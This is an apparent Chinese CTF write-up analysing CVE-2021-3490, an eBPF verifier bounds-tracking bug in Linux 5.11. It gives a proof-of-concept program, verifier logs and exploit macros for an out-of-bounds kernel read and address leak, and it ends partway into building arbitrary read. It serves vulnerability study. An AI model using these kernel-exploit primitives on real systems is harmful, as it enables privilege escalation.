0%

ebpf pwn+CVE-2021-3490

ebpf-pwn-A-Love-Story 复现

1
2
/ $ cat /proc/version 
Linux version 5.11.16 (arttnba3@ubuntu) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.3
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/bin/sh

mount -t proc proc /proc
mount -t tmpfs none /tmp
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig lo 127.0.0.1 netmask 255.255.255.0
route add -net 127.0.0.0 netmask 255.255.255.0 lo
echo "flag{yhellow}" > /flag
chmod 666 /flag

setsid /bin/cttyhack setuidgid 0 /bin/sh
echo 'sh end!\n'
#poweroff -d 1800000 -f &
umount /proc
umount /sys

poweroff -f

下载 5.11.16 的内核源码:Index of /pub/linux/kernel/v5.x/

漏洞分析

本题目没有内核模块,漏洞点为 CVE-2021-3490:

  • CVE-2021-3490 是一个发生在 eBPF verifier 中的漏洞,由于 eBPF verifier 在校验位运算操作( 与、或、异或 )时没有正确地更新寄存器的 32 位边界,从而导致攻击者可以构造出非法的运行时寄存器值以进行提权

在 eBPF 对寄存器计算的指令中,分为64位和32位操作两部分

  • 64位指令会对寄存器的64位全部进行操作
  • 32位指令只会对寄存器的低32位进行操作

eBPF 程序的安全主要是由 verifier 保证的,verifier 会模拟执行每一条指令并验证寄存器的值是否合法,主要关注这几个字段:

  • smin_valuesmax_value:64 位有符号的值的可能取值边界
  • umin_valueumax_value:64 位无符号的值的可能取值边界
  • s32_min_values32_max_value:32 位有符号的值的可能取值边界
  • u32_min_valueu32_max_value:32 位无符号的值的可能取值边界

其中,这个寄存器中具体的值,会用如下结构体进行表示:

1
2
3
4
struct tnum {
u64 value;
u64 mask;
};
  • value & mask 表示这个寄存器中可以确定的值

用于检测指令合法性的函数为 do_check,该函数会遍历每一条指令并根据指令的不同类型进行不同操作,对于算术指令(BPF_ALU / BPF_ALU64)而言有如下调用链(模拟通过后才能正常加载)

1
2
3
4
do_check()        					// 遍历每一条指令并根据类型调用相应函数处理
->check_alu_op() // 根据算术指令的opcode进行不同处理
->adjust_reg_min_max_vals() // 计算新的寄存器边界值
->adjust_scalar_min_max_vals() // 根据opcode计算具体的新边界值

首先分析调整标量数据范围的 adjust_scalar_min_max_vals 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
struct bpf_insn *insn,
struct bpf_reg_state *dst_reg,
struct bpf_reg_state src_reg)
{

......

switch (opcode) {

......

case BPF_AND:
dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_and(dst_reg, &src_reg); /* 处理32位(漏洞函数) */
scalar_min_max_and(dst_reg, &src_reg); /* 处理64位 */
break;
case BPF_OR:
dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_or(dst_reg, &src_reg);
scalar_min_max_or(dst_reg, &src_reg);
break;
case BPF_XOR:
dst_reg->var_off = tnum_xor(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_xor(dst_reg, &src_reg);
scalar_min_max_xor(dst_reg, &src_reg);
break;

......

default:
mark_reg_unknown(env, regs, insn->dst_reg);
break;
}

if (alu32)
zext_32_to_64(dst_reg);

__update_reg_bounds(dst_reg); /* 对比寄存器的var_off并更新边界值 */
__reg_deduce_bounds(dst_reg); /* 边界调整校验 */
__reg_bound_offset(dst_reg); /* 基于边界值范围重新计算var_off的值 */
return 0;
}

cve 的漏洞点位于函数 scalar32_min_max_and,其中的 BPF_AND \ BPF_OR \ BPF_XOR 三类操作有问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
/* 判断是否能确定src_reg和dst_reg两个寄存器低32位的值(是否为'0') */
bool src_known = tnum_subreg_is_const(src_reg->var_off);
bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
/* 获取dst_reg->var_off的低32位值,并且分别获取src_reg的s32_min_value和u32_max_value */
struct tnum var32_off = tnum_subreg(dst_reg->var_off);
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;

/* 如果src_reg和dst_reg的值都已经确定,那么则直接返回(因为64位时还会进行更新) */
if (src_known && dst_known)
return;

/* 使用var32_off的值来更新dst_reg的u32_min_value和u32_max_value */
dst_reg->u32_min_value = var32_off.value;
dst_reg->u32_max_value = min(dst_reg->u32_max_value, umax_val);
if (dst_reg->s32_min_value < 0 || smin_val < 0) {
/* 同为负则用src_reg的最大最小值 */
dst_reg->s32_min_value = S32_MIN;
dst_reg->s32_max_value = S32_MAX;
} else {
/* 否则用dst_reg的u32_min_value和u32_max_value更新 */
dst_reg->s32_min_value = dst_reg->u32_min_value;
dst_reg->s32_max_value = dst_reg->u32_max_value;
}
}
  • 在更新 32 位边界值时,如果两个寄存器的低 32 位都为 known 那就可以直接跳过,因为程序认为 64 位时还会进行更新
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
/* 判断是否能确定src_reg和dst_reg两个寄存器(是否为'0') */
bool src_known = tnum_is_const(src_reg->var_off);
bool dst_known = tnum_is_const(dst_reg->var_off);
/* 获取dst_reg->var_off的值,并且分别获取src_reg的smin_value和umax_value */
s64 smin_val = src_reg->smin_value;
u64 umax_val = src_reg->umax_value;

/* 如果src_reg和dst_reg的值都已经确定,那么更新边界值 */
if (src_known && dst_known) {
__mark_reg_known(dst_reg, dst_reg->var_off.value);
return;
}

/* We get our minimum from the var_off, since that's inherently
* bitwise. Our maximum is the minimum of the operands' maxima.
*/
dst_reg->umin_value = dst_reg->var_off.value;
dst_reg->umax_value = min(dst_reg->umax_value, umax_val);
if (dst_reg->smin_value < 0 || smin_val < 0) {
/* Lose signed bounds when ANDing negative numbers,
* ain't nobody got time for that.
*/
dst_reg->smin_value = S64_MIN;
dst_reg->smax_value = S64_MAX;
} else {
/* ANDing two positives gives a positive, so safe to
* cast result into s64.
*/
dst_reg->smin_value = dst_reg->umin_value;
dst_reg->smax_value = dst_reg->umax_value;
}
/* We may learn something more from the var_off */
__update_reg_bounds(dst_reg); /* 对比寄存器的var_off并更新边界值 */
}
  • 在更新64位边界值时,若两个寄存器都为 known 就直接调用 __mark_reg_known(PS:64位和32位判断调用 __mark_reg_known 的条件不同,这也引发了漏洞)
  • __mark_reg_known 用于设置一个已经确定的寄存器,简单的调用 tnum_const 设置寄存器 var_offknown,并给对应边界赋值
1
2
3
4
5
6
7
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
/* Clear id, off, and union(map_ptr, range) */
memset(((u8 *)reg) + sizeof(reg->type), 0,
offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type));
___mark_reg_known(reg, imm);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
static void ___mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
reg->var_off = tnum_const(imm);
reg->smin_value = (s64)imm;
reg->smax_value = (s64)imm;
reg->umin_value = imm;
reg->umax_value = imm;

reg->s32_min_value = (s32)imm;
reg->s32_max_value = (s32)imm;
reg->u32_min_value = (u32)imm;
reg->u32_max_value = (u32)imm;
}

在最后还会调用 __update_reg_bounds() 对比寄存器的 var_off 并更新边界值:

1
2
3
4
5
static void __update_reg_bounds(struct bpf_reg_state *reg)
{
__update_reg32_bounds(reg);
__update_reg64_bounds(reg);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
struct tnum var32_off = tnum_subreg(reg->var_off);

/* min signed is max(sign bit) | min(other bits) */
reg->s32_min_value = max_t(s32, reg->s32_min_value,
var32_off.value | (var32_off.mask & S32_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->s32_max_value = min_t(s32, reg->s32_max_value,
var32_off.value | (var32_off.mask & S32_MAX));
reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
reg->u32_max_value = min(reg->u32_max_value,
(u32)(var32_off.value | var32_off.mask));
}
1
2
3
4
5
6
7
8
9
10
11
12
static void __update_reg64_bounds(struct bpf_reg_state *reg)
{
/* min signed is max(sign bit) | min(other bits) */
reg->smin_value = max_t(s64, reg->smin_value,
reg->var_off.value | (reg->var_off.mask & S64_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->smax_value = min_t(s64, reg->smax_value,
reg->var_off.value | (reg->var_off.mask & S64_MAX));
reg->umin_value = max(reg->umin_value, reg->var_off.value);
reg->umax_value = min(reg->umax_value,
reg->var_off.value | reg->var_off.mask);
}
  • 计算方法如下:
    • 最小边界值 = [min_value , var_off.value | (var_off.mask & MIN) ] 中的最大者
    • 最大边界值 = [max_value , var_off.value | (var_off.mask & MAX) ] 中的最小者

但这样存在一个问题,若存在一个高32位 unknown 低32位 known 的寄存器:

  • 在理论上,程序执行时 scalar32_min_max_and 就能确定该寄存器的值,应该调用 __mark_reg_known 进行更新
  • 但程序认为在 scalar_min_max_and 中也能检查寄存器是否 known,因此选择在 scalar_min_max_and 中调用 __mark_reg_known,而 scalar32_min_max_and 中直接返回
  • 核心问题就是,函数 scalar32_min_max_andscalar_min_max_and 中判断寄存器是否 known 的条件不同,导致原本应该执行 __mark_reg_known 的程序没有执行

如果有以下两个寄存器:

  • R2 = { .value = 0x1, .mask = 0xffffffff00000000 }:该寄存器低 32 位值已知为 0x1,高 32 位不确定
  • R3 = { .value = 0x100000002, .mask = 0x0 }:该寄存器 64 位值全部已知,为 0x100000002

假如我们将 R2 与 R3 做与运算,其结果为 { .value = 0, .mask = 0x100000000 },详细调用过程如下:

  • 首先执行 adjust_scalar_min_max_vals 函数,随后会进入 tnum_and 函数
    • 该函数返回 R2.var_off = {mask = 0x100000000; value=0x0}
    • 由于 R2 的高32位是不确定,导致 0x100000002 中高出32位的非“0”部分不确定,所以最终 R2.var_off.mask = 0x100000000(仅有第32位不确定)
  • 然后执行 scalar32_min_max_and 检查寄存器32位的值的范围
    • 这里由于 R2R3 两个寄存器的低32位的值都是确定的,该函数直接返回
  • 接着执行 scalar_min_max_and 检查寄存器64位的值的范围
    • 由于 R2 寄存器第32位仍不确定,因此不会调用 __mark_reg_known
  • 在末尾调用 __update_reg_bounds,这个函数会对 R2 的值做相应修改:
    • 设置 R2.u32_max_value=0x0(由于 R2.var_off.value=0 < R2.u32_max_value=1
    • 设置 R2.u32_min_value=0x1(由于 R2.var_off.value=0 < R2.u32_min_value=1
  • 最后执行 __reg_bound_offset 函数,也不会改变 R2 的属性

因此经过该轮计算之后 R2 的最小值为 1,最大值为 0,而这显然是不合理的

测试样例如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#define _GNU_SOURCE
#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <ctype.h>

#include "kernelpwn.h"
#include "bpf_tools.h"

#define MAP_SIZE 0x2000

#define POC_PROG(__map_fd) \
/* Load value from map */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \ /* r9 = 0 */
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \ /* r1 = r9 */
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \ /* r2 = r10(rbp) */
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \ /* r2 += -8 */
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0), \ /* *(r2 + 0) = 0 */
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \ /* if r0 != 0x0 goto pc+1 */
BPF_EXIT_INSN(), \ /* jmp exit */
/* load value into r2, make it part-unknown */ \
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0), \ /* r2 = *(r0 + 0) */
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \ /* r4 = -1 */
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \ /* r4 <<= 32 */
BPF_ALU64_REG(BPF_AND, BPF_REG_2, BPF_REG_4), \ /* r2 &= r4 */
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x1), \ /* r2 += 1 */
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \ /* r3 = 1 */
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \ /* r3 <<= 32 */
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \ /* r3 += 2 */
/* triger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, BPF_REG_2, BPF_REG_3) /* r2 &= r3 */


int main(int argc , char **argv, char **envp)
{
int map_fd;
int key;
size_t value[0x1000];
int log_fd;

map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, MAP_SIZE, 0x100);
if (map_fd < 0) {
err_exit("FAILED to create eBPF map!");
}

key = 0;
value[0] = 0;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0) {
err_exit("FAILED to load value into map!");
}

struct bpf_insn prog[] = {
POC_PROG(map_fd),
BPF_EXIT_INSN()
};
run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 2, 1);

return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/ $ ./exp
func#0 @0
0: R1=ctx(id=0,off=0,imm=0) R10=fp0
0: (18) r9 = 0x0
2: R1=ctx(id=0,off=0,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
2: (bf) r1 = r9
4: (07) r2 += -8
2: (bf) r1 = r9
3: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
3: (bf) r2 = r10
4: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
4: (07) r2 += -8
5: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp-8 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
5: (7a) *(u64 *)(r2 +0) = 0
6: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp-8 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
6: (85) call bpf_map_lookup_elem#1
7: R0_w=map_value_or_null(id=1,off=0,ks=4,vs=8192,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
7: (55) if r0 != 0x0 goto pc+1
R0_w=invP0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
8: R0_w=invP0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
8: (95) exit
9: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
9: (79) r2 = *(u64 *)(r0 +0)
R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
10: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
10: (b7) r4 = -1
11: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R4_w=invP-1 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
11: (67) r4 <<= 32 /* r4=0xffffffff00000000 */
12: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
12: (5f) r2 &= r4 /* 取r2的高32位 */
13: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smax_value=9223372032559808512,umax_value=18446744069414584320,var_off=(0x0; 0xffffffff00000000),s32_min_value=0,s32_max_value=0,u32_max_val
ue=0) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
13: (07) r2 += 1
14: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r2={s32_min_value=1,s32_max_value=1},var_off=(0x1; 0xffffffff00000000) */
14: (b7) r3 = 1
15: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP1 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
15: (67) r3 <<= 32
16: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP4294967296 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
16: (07) r3 += 2 /* r3=0x100000002 */
17: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP4294967298 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r2={s32_min_value=1,s32_max_value=1},var_off=(0x1; 0xffffffff00000000)
r3=0x100000002,var_off=(0x100000002; 0x0) */
17: (5f) r2 &= r3
18: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,umax_value=4294967296,var_off=(0x0; 0x100000000),s32_min_value=1,s32_max_value=0,u32_min_value=1,u32_max_value=0) R3_w=invP4294967298 R4_w=i
nvP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* 注意r2中{s32_min_value=1,s32_max_value=0},证明漏洞已经生效 */
18: (95) exit
R0 leaks addr as return value
processed 18 insns (limit 1000000) max_states_per_insn 0 total_states 1 peak_states 1 mark_read 1

入侵思路

核心思路参考:[漏洞分析] 【CVE-2021-3490】eBPF verifier 32 位边界计算错误漏洞分析与利用 (buaq.net)

利用漏洞构造一个最小边界值为 “1”、最大边界值为 “0” 的寄存器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#define VULN_REG    BPF_REG_6
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define TRIGGER_VULN(__map_fd) \
/* load value into r2, make it part-unknown */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, VULN_REG, BPF_REG_8, 0), \
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_4), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \
/* triger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_3)
  • 因为 R1~R5 有的时候要用来作为函数参数,所以这里在 R6 上构造
  • 此时 R6 32 位边界值为 [1, 0] ,32位运行时值为 0

构造运行时为 “1” 但 verifier 确信为 “0” 的寄存器:

1
2
3
4
5
6
7
8
9
10
11
#define MAKE_VULN_REG(__map_fd)                         \
/* load value into r3, make it [0, 1] under 32 bit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), \
BPF_JMP32_IMM(BPF_JLE, BPF_REG_7, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU64_REG(BPF_ADD, VULN_REG, BPF_REG_7), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
BPF_ALU64_IMM(BPF_AND, VULN_REG, 0x1), \
BPF_MOV64_IMM(BPF_REG_0, 0)
  • 构造出另一个 32 位边界值为 [0, 1] ,32位运行时值为 0 寄存器 R7
  • 把寄存器 R6 和 R7 相加,得到新的 R6,边界值为 [1, 1] ,32位运行时值为 0,于是便获得了一个运行时为 “0” 但 verifier 认为是 “1” 的寄存器
  • 如果我们再给 R6 加上 1 ,从而使得边界值为 [2, 2] ,但实际上的 32 位值为 1
  • 再将 R6 与 1& 运算,从而使得边界值为 [0, 0] ,但实际上的 32 位值为 1
  • 最终 verifier 便会认为该寄存器的值变为 “0”,但其实际上的运行时值为 “1”
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
36: (07) r6 += 1
37: R0_w=invP0 R6_w=invP(id=0,smin_value=-9223372036854775806,smax_value=9223372
032559808514,umin_value=2,umax_value=18446744069414584322,var_off=(0x2; 0xffffff
ff00000000),s32_min_value=2,s32_max_value=2,u32_max_value=2) R7_w=invP(id=0,smax
_value=9223372032559808513,umax_value=18446744069414584321,var_off=(0x0; 0xfffff
fff00000001),s32_min_value=0,s32_max_value=1,u32_max_value=1) R8_w=map_value(id=
0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp
-8=mmmmmmmm
/* r6={s32_min_value=2,s32_max_value=2},var_off=(0x2; 0xffffffff00000000) */
37: (57) r6 &= 1
38: R0_w=invP0 R6_w=invP0 R7_w=invP(id=0,smax_value=9223372032559808513,umax_val
ue=18446744069414584321,var_off=(0x0; 0xffffffff00000001),s32_min_value=0,s32_ma
x_value=1,u32_max_value=1) R8_w=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_
ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r6=0,var_off=(0x0; 0xffffffff00000000) */

泄露内核基地址:

对于 BPF_MAP_TYPE_ARRAY 类型 的 map 而言,其 wrapper 为 bpf_array 类型(即 bpf_map 内嵌于该结构体中),数据则直接存放在其内部的 value 数组成员当中,因此在查找元素时我们获得的其实是一个指向 bpf_array 内部的指针

1
2
3
4
5
6
7
8
9
10
11
struct bpf_array {
struct bpf_map map;
u32 elem_size;
u32 index_mask;
struct bpf_array_aux *aux;
union {
char value[0] __aligned(8);
void *ptrs[0] __aligned(8);
void __percpu *pptrs[0] __aligned(8);
};
};
  • 因此我们只需要前向读取便能读取到 bpf_map,之后可以通过 bpf_map 的函数表泄露内核地址

理论上我们可以构造寄存器,使 verifier 将负数识别为 “0”,但实际上我们还要突破 ALU Sanitation 的检查:

  • ALU Sanitation 是一个用于运行时动态检测的功能,通过对程序正在处理的实际值进行运行时检查以弥补 verifier 静态分析的不足
  • 核心原理就是在 eBPF 程序中的每一条指令前面都添加上额外的辅助指令
1
2
3
4
5
6
7
8
9
10
11
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
if (issrc) {
*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg);
insn->src_reg = BPF_REG_AX;
} else {
*patch++ = BPF_ALU64_REG(BPF_AND, off_reg, BPF_REG_AX);
}
  • 其中 aux->alu_limit 为当前指针运算范围,初始时为 “0”,与指针所做的常量运算同步
  • 对于减法而言可读范围为 (ptr - alu_limit, ptr](这里保证了指针的偏移不会为负)

由于我们有运行时为 “1”,但 verifier 认为是 “0” 的寄存器,我们可以这样调整范围:

  • 构造另外一个同样是运行时值为 “1”,但 verifier 认为是 “0” 的寄存器 R8(可以选择直接将 R6 拷贝给 R8)
  • 令 R7 指向 map 第一个元素的第一个字节 value[0]
  • 将 R7 加上 0x1000R7 = value[0x1000]alu_limit = 0x1000
  • 将 R8 乘上 0x1000R8 = 0x1000
  • 执行 R7 -= R8,由于 verifier 认为 R8 为 “0”,因此 alu_limit 保持不变,但 R7 实际上已经指回了 value[0]
  • 执行 R7 -= 0x110R7 = value[-0x110]alu_limit = 0x1000
1
2
3
4
5
6
7
8
9
10
11
12
#define LEAK_MAP_OPS(__map_fd)                             \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x110), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_7), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0)

构造任意读 RAA:

现在我们能够读写 bpf_map 中的数据,我们需要注意其中的 btf 指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
struct bpf_map {
const struct bpf_map_ops *ops ____cacheline_aligned;
struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
void *security;
#endif
enum bpf_map_type map_type;
u32 key_size;
u32 value_size;
u32 max_entries;
u32 map_flags;
int spin_lock_off; /* >=0 valid offset, <0 error */
u32 id;
int numa_node;
u32 btf_key_type_id;
u32 btf_value_type_id;
